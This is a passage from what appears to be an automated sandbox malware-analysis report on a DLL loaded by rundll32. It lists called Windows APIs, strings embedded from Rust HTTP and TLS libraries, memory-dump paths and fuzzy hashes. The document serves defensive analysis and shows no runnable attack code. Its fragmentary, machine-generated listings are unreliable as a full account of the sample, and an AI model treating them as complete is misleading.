                                • Part of subcall function 04DC8E5B: __mtinitlocknum.LIBCMT ref: 04DC8E71
                                • Part of subcall function 04DC8E5B: __amsg_exit.LIBCMT ref: 04DC8E7D
                                • Part of subcall function 04DC8E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,04DC3EEC,0000000D,04DD6340,00000008,04DC3FE3,00000000,?,04DC1050,00000000,04DD6278,00000008,04DC10B5,?), ref: 04DC8E85
                              • __tzset_nolock.LIBCMT ref: 04DC649F
                                • Part of subcall function 04DC5D95: __lock.LIBCMT ref: 04DC5DB7
                                • Part of subcall function 04DC5D95: ____lc_codepage_func.LIBCMT ref: 04DC5DFE
                                • Part of subcall function 04DC5D95: __getenv_helper_nolock.LIBCMT ref: 04DC5E20
                                • Part of subcall function 04DC5D95: _free.LIBCMT ref: 04DC5E57
                                • Part of subcall function 04DC5D95: _strlen.LIBCMT ref: 04DC5E5E
                                • Part of subcall function 04DC5D95: __malloc_crt.LIBCMT ref: 04DC5E65
                                • Part of subcall function 04DC5D95: _strlen.LIBCMT ref: 04DC5E7B
                                • Part of subcall function 04DC5D95: _strcpy_s.LIBCMT ref: 04DC5E89
                                • Part of subcall function 04DC5D95: __invoke_watson.LIBCMT ref: 04DC5E9E
                                • Part of subcall function 04DC5D95: _free.LIBCMT ref: 04DC5EAD
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                              • String ID:
                              • API String ID: 1828324828-0
                              • Opcode ID: 742552d83785f348b27f7f5c99eb8d4831cf935c95d5af4cd13bc2c9fbdbee67
                              • Instruction ID: 620925a8c251ab9c6c7326397c3b0a92ce68c3605cd51189e442a99834ae9bc3
                              • Opcode Fuzzy Hash: 742552d83785f348b27f7f5c99eb8d4831cf935c95d5af4cd13bc2c9fbdbee67
                              • Instruction Fuzzy Hash: 4DE0E634A45732E7DB227BA5A51160DB160EB94B66B50411DE4502758189746542C6B1
                              APIs
                              • connect.WS2_32(?,6CC38577,0C7502F8), ref: 6CC476C6
                              • GetLastError.KERNEL32 ref: 6CC476D0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastconnect
                              • String ID:
                              • API String ID: 374722065-0
                              • Opcode ID: 1fd81914dc02975c6eb5aa0cb31e1638d23aee0b9df923447eaf5fa14c89211d
                              • Instruction ID: 5e6e80334cba3c6a037434a33fee0159ec79687c1bf240d3b7089a2efb05ad78
                              • Opcode Fuzzy Hash: 1fd81914dc02975c6eb5aa0cb31e1638d23aee0b9df923447eaf5fa14c89211d
                              • Instruction Fuzzy Hash: 60D05E71105211AFE7105F29D544BB67BE8AF05350F18C85DE4C0D6A00E774C884DB60
                              APIs
                              • RegCloseKey.ADVAPI32(80000001,04DB6E1A), ref: 04DB6E49
                              • RegCloseKey.ADVAPI32(000008CC), ref: 04DB6E52
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 31cc468a1c21a642f4551931c60f7be983b7b0e8fd4110a393d0885e0533caf4
                              • Instruction ID: 68a28fa01d2825055e83479c1d33cfd8716442f931356fef4c2865b78e5d2bee
                              • Opcode Fuzzy Hash: 31cc468a1c21a642f4551931c60f7be983b7b0e8fd4110a393d0885e0533caf4
                              • Instruction Fuzzy Hash: 41C09B72D0103857CF10E7A4FD44D4D77B89F4C210F1140C2A104A3114C634BD41CF90
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,6CCB5F8C,6CCB5F64), ref: 6CC02202
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CCB5F8C,6CCB5F64), ref: 6CC0222D
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 6fead2eb3b6a702d2f7784405b96e1c30225f118fa09ebbeaa291d9ba2bdfa91
                              • Instruction ID: f49c8ef2b8fe819807cd039aeaf0c97b23c67df539db3b187414f6935b241ee5
                              • Opcode Fuzzy Hash: 6fead2eb3b6a702d2f7784405b96e1c30225f118fa09ebbeaa291d9ba2bdfa91
                              • Instruction Fuzzy Hash: FE417770A09F448BD751CF28C490AA7B7F0FF8A341F008A5EE49E5A212EB31E481DB02
                              APIs
                              • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000000,?,?,6CC11D27,6CCB58B1), ref: 6CC0C99B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: QueryValue
                              • String ID:
                              • API String ID: 3660427363-0
                              • Opcode ID: 60b13ae78b097f24b96a3f9a4aaef0b701cc38bb03520601838494f7966be34b
                              • Instruction ID: a766e1866ef8dd79f3f4bbe5cdd7a526944e295b36d8725f30b0b5084115eabc
                              • Opcode Fuzzy Hash: 60b13ae78b097f24b96a3f9a4aaef0b701cc38bb03520601838494f7966be34b
                              • Instruction Fuzzy Hash: 172116756087459FD304DF15C480A5ABBE5EB89354F14CA2EE4898B740E735E889CBA2
                              APIs
                              • SetThreadStackGuarantee.KERNEL32(?), ref: 6CC4FC1B
                                • Part of subcall function 6CBC5AD0: RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FreeGuaranteeHeapStackThread
                              • String ID:
                              • API String ID: 4181682901-0
                              • Opcode ID: 53f189aaeeb774ecd2f839a95b9dd2097b2598d3f1ad67b354606450ff9f23b0
                              • Instruction ID: 3a53aa3d8b709c0f8957145660484b5186133f7d5de0a8ecf21945c282eea2f2
                              • Opcode Fuzzy Hash: 53f189aaeeb774ecd2f839a95b9dd2097b2598d3f1ad67b354606450ff9f23b0
                              • Instruction Fuzzy Hash: 2F1139B1900649CFCB10DF95C985BEEBBB4FB48324F108529E805A7780D379A944CBA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: closesocket
                              • String ID:
                              • API String ID: 2781271927-0
                              • Opcode ID: f15929706a82749525eab815a009abdab47e039da349ee39f5c65d17e8414770
                              • Instruction ID: 5d39303738c7036bc7efe64774e83c62563c18df9bac85a2fadb24cb81e31f38
                              • Opcode Fuzzy Hash: f15929706a82749525eab815a009abdab47e039da349ee39f5c65d17e8414770
                              • Instruction Fuzzy Hash: A8E0D8713008419BC605D719D9409ADB771FFC1318754C159D01547F50DF31EC2AD784
                              APIs
                              • QueryContextAttributesW.SECUR32(?,00000053,?,00000000,?,6CC36E29), ref: 6CC472BC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AttributesContextQuery
                              • String ID:
                              • API String ID: 1320229847-0
                              • Opcode ID: 0fa0f861b42fdd6a7c7fd97f62ef28635ae25bb79277e38cdf9a58a7187d9121
                              • Instruction ID: f01e2ef657cb791055204594ff3ea627ac30ef5cb7b9216c10c45172927ebe75
                              • Opcode Fuzzy Hash: 0fa0f861b42fdd6a7c7fd97f62ef28635ae25bb79277e38cdf9a58a7187d9121
                              • Instruction Fuzzy Hash: BBE08CB1A01700AFF3604F29DC01B637BE8AB15B52F14881CB685C7680E6789840CB61
                              APIs
                              • RtlAllocateHeap.NTDLL(02870000,00000000,?,?,6CBC5AAF,?,00000004,6CBCE4B2,?,6CC4682F,?,?,?,?,6CC465EB,00000002), ref: 6CC5011F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 3f1f89839c150c1e44a0ee7e53250e5b737db2be92f7ad8ee0979f960412b2b7
                              • Instruction ID: 95e1fad24aa6f90de9cdd72349ba5ea9d26710c181c2307d20fd486f5566b227
                              • Opcode Fuzzy Hash: 3f1f89839c150c1e44a0ee7e53250e5b737db2be92f7ad8ee0979f960412b2b7
                              • Instruction Fuzzy Hash: 25C08C70200209AE6E0016A7AD48D3733BCDA859087404005B04EC2902FA26E8A48464
                              APIs
                              • RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: 493b4b48f9730c328171872aea817e32a656db09a0d1822dd259188ce111f9d4
                              • Instruction ID: c787eccd42acfecf5444fd9a257bd76d98bd7e66bbdd7421f61f72f331915f92
                              • Opcode Fuzzy Hash: 493b4b48f9730c328171872aea817e32a656db09a0d1822dd259188ce111f9d4
                              • Instruction Fuzzy Hash: 2CC092B0310041BBDF099B12CF9DB2CBA37F783300F208158F246594A4D6732A46DB0A
                              APIs
                              • RegCloseKey.KERNEL32(?,6CC11DC5), ref: 6CC609A0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 6c9733f1f0098d20d6df1820d63daa835330e09b5a65ed5d6cd4cbb08c4b53c2
                              • Instruction ID: 89f8f6c824ee06362b67c55f501b17c11ac4294c77edbda6c90e6dff73157b4e
                              • Opcode Fuzzy Hash: 6c9733f1f0098d20d6df1820d63daa835330e09b5a65ed5d6cd4cbb08c4b53c2
                              • Instruction Fuzzy Hash: A5A002F4F175416AFE2C6B27C759A3B2E795A45286300056D6987E0804D635C042C61D
                              APIs
                              • memmove.VCRUNTIME140(?,?,000001C8), ref: 6CC1BD37
                                • Part of subcall function 6CC50110: RtlAllocateHeap.NTDLL(02870000,00000000,?,?,6CBC5AAF,?,00000004,6CBCE4B2,?,6CC4682F,?,?,?,?,6CC465EB,00000002), ref: 6CC5011F
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC2286F, 6CC22905
                              • PRI * HTTP/2.0SM, xrefs: 6CC1C4DB
                              • invalid SETTINGS frame, xrefs: 6CC1C960
                              • assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs, xrefs: 6CC227AC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocateHeapmemmove
                              • String ID: PRI * HTTP/2.0SM$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs$called `Result::unwrap()` on an `Err` value$invalid SETTINGS frame
                              • API String ID: 3274069717-2943561727
                              • Opcode ID: a98c426f1d99c9824e683b1fd2a795c057e53f5da04363cca7d7b848c8a5bcd7
                              • Instruction ID: 94e912646a15b53c3cdf5b682735b01d80dd94a04d057817ec0d3e366dd1b5b2
                              • Opcode Fuzzy Hash: a98c426f1d99c9824e683b1fd2a795c057e53f5da04363cca7d7b848c8a5bcd7
                              • Instruction Fuzzy Hash: 4EE36274A097818FD7A1CF29C184B9ABBE0BF89310F14496EE89CDB315E770A945CF52
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000138), ref: 6CC3BD79
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC3D4BE
                              • memmove.VCRUNTIME140(?,?,000000C0,6CCB654C), ref: 6CC3D52B
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC3D587
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC3D5A8
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC3D5E6
                              Strings
                              • invalid minimum TLS version for backendinvalid maximum TLS version for backendvalid request parts, xrefs: 6CC3C645
                              • NO_PROXYno_proxy[, xrefs: 6CC3BE37
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: NO_PROXYno_proxy[$invalid minimum TLS version for backendinvalid maximum TLS version for backendvalid request parts
                              • API String ID: 2162964266-2564500342
                              • Opcode ID: 9d367786e52a34b03b0d33bc99a0f95c5a151ea95a738abc7d202fc428534192
                              • Instruction ID: cbbe73ef672b1fc7c2a39fbdbb1c1b30faddb8d7a8ec08057d293eac098b4625
                              • Opcode Fuzzy Hash: 9d367786e52a34b03b0d33bc99a0f95c5a151ea95a738abc7d202fc428534192
                              • Instruction Fuzzy Hash: 61038C756087918FD721CF24C480B9EBBF1BF89314F14896EE88D9B751EB70A849CB52
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: $/1.1$/1.1$E$HTTP$PRI * HTTP/2.0SM$close
                              • API String ID: 0-737735271
                              • Opcode ID: 8adec4fbd02e8de6a77a8ae90cf8dd2a270e1d26fef31e6c0ae27f4d71662996
                              • Instruction ID: fd0321c79a5c14c246d931895d85e6b0e13184f8cceec6e1220365d64249ce5a
                              • Opcode Fuzzy Hash: 8adec4fbd02e8de6a77a8ae90cf8dd2a270e1d26fef31e6c0ae27f4d71662996
                              • Instruction Fuzzy Hash: 15535A756087C18FD325CF24C49079FBBE1AFC9314F248A1EE4A98B751DB74988ACB52
                              APIs
                              • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDC209
                                • Part of subcall function 6CBC5AD0: RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDC247
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CBDC2BF
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDC470
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDCBA8
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBDCC09
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBDCC3F
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDCC6E
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDCCB8
                              • memmove.VCRUNTIME140(?,?,0000007E,?), ref: 6CBDCD12
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDCD3B
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CBDCD65
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$FreeHeap
                              • String ID:
                              • API String ID: 3670176668-0
                              • Opcode ID: 10c08327c6642d9df7c208653faa30eda70e4a97573c6ce7dc62ddafa60a3eac
                              • Instruction ID: c6999644dff829ce1a0a2ce0b5a9b5a2c4a59a2a1fa127a6c779310d2e753b6c
                              • Opcode Fuzzy Hash: 10c08327c6642d9df7c208653faa30eda70e4a97573c6ce7dc62ddafa60a3eac
                              • Instruction Fuzzy Hash: A47266759093818FD322CF24C4507AEFBE1BF8A309F05895DE8885B791DB74A949CB93
                              APIs
                              • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC4840A
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC48255), ref: 6CC48419
                              • GetConsoleMode.KERNEL32(00000000,?), ref: 6CC48457
                              • NtWriteFile.NTDLL ref: 6CC484DD
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC484ED
                              • RtlNtStatusToDosError.NTDLL ref: 6CC4857A
                              • CloseHandle.KERNEL32(00000000), ref: 6CC4876A
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC4871C
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                              • String ID: called `Result::unwrap()` on an `Err` value
                              • API String ID: 3090192319-2333694755
                              • Opcode ID: c2198e714d9461539c6386ea8e09e2a34f18a6f027277bd952d2edad0ea304e0
                              • Instruction ID: b8a43445071404693df73786abea6c982a9227d418e73f22d453b72d130557a2
                              • Opcode Fuzzy Hash: c2198e714d9461539c6386ea8e09e2a34f18a6f027277bd952d2edad0ea304e0
                              • Instruction Fuzzy Hash: 5BB1D6B0D042889FDB00CF95C894BEEBFB5BF41318F14C52AE495ABB80E7349949CB91
                              APIs
                              • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 6CC527D3
                              Strings
                              • main, xrefs: 6CC52934
                              • <unnamed>, xrefs: 6CC526A8, 6CC52870
                              • Box<dyn Any>aborting due to panic at , xrefs: 6CC52848
                              • full, xrefs: 6CC52892
                              • RUST_BACKTRACEentity not foundpermission deniedconnection refusedconnection resethost unreachablenetwork unreachableconnection abortednot connectedaddress in useaddress not availablenetwork downbroken pipeentity already existsoperation would blocknot a directo, xrefs: 6CC525FE
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressSingleWake
                              • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $RUST_BACKTRACEentity not foundpermission deniedconnection refusedconnection resethost unreachablenetwork unreachableconnection abortednot connectedaddress in useaddress not availablenetwork downbroken pipeentity already existsoperation would blocknot a directo$full$main
                              • API String ID: 3114109732-636500360
                              • Opcode ID: 18a69fba6b3f9b0328a053db75d8c88144fa202a2bad4555d59a66ca89891050
                              • Instruction ID: 9c1c845f8040012b5833ab91ac6bccbb07816a20857d3170782db1d24e8002b2
                              • Opcode Fuzzy Hash: 18a69fba6b3f9b0328a053db75d8c88144fa202a2bad4555d59a66ca89891050
                              • Instruction Fuzzy Hash: 12228CB0600B408FD721CF25C0A8B52B7F1BB45308F54896EC99A8BF91E735F569CB95
                              APIs
                              • memset.VCRUNTIME140(?,00000000,00001000), ref: 6CC49F8A
                              • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 6CC49FA6
                              • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000800,00000000), ref: 6CC49FD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FormatHandleMessageModulememset
                              • String ID: NTDLL.DLL
                              • API String ID: 2302251862-1613819793
                              • Opcode ID: bed357937c64d7120d626d6fa2bb860a74b5ee79902bb33e89e3273597c53303
                              • Instruction ID: 078ec0397323cc05781585862053380b76fe61fb8e8b4213fb8cc8ecfed2e854
                              • Opcode Fuzzy Hash: bed357937c64d7120d626d6fa2bb860a74b5ee79902bb33e89e3273597c53303
                              • Instruction Fuzzy Hash: BAD1CE72E052588FEB10CFD5C8803EDBBB2FB85314F248239D415ABB85E3759945CB50
                              Strings
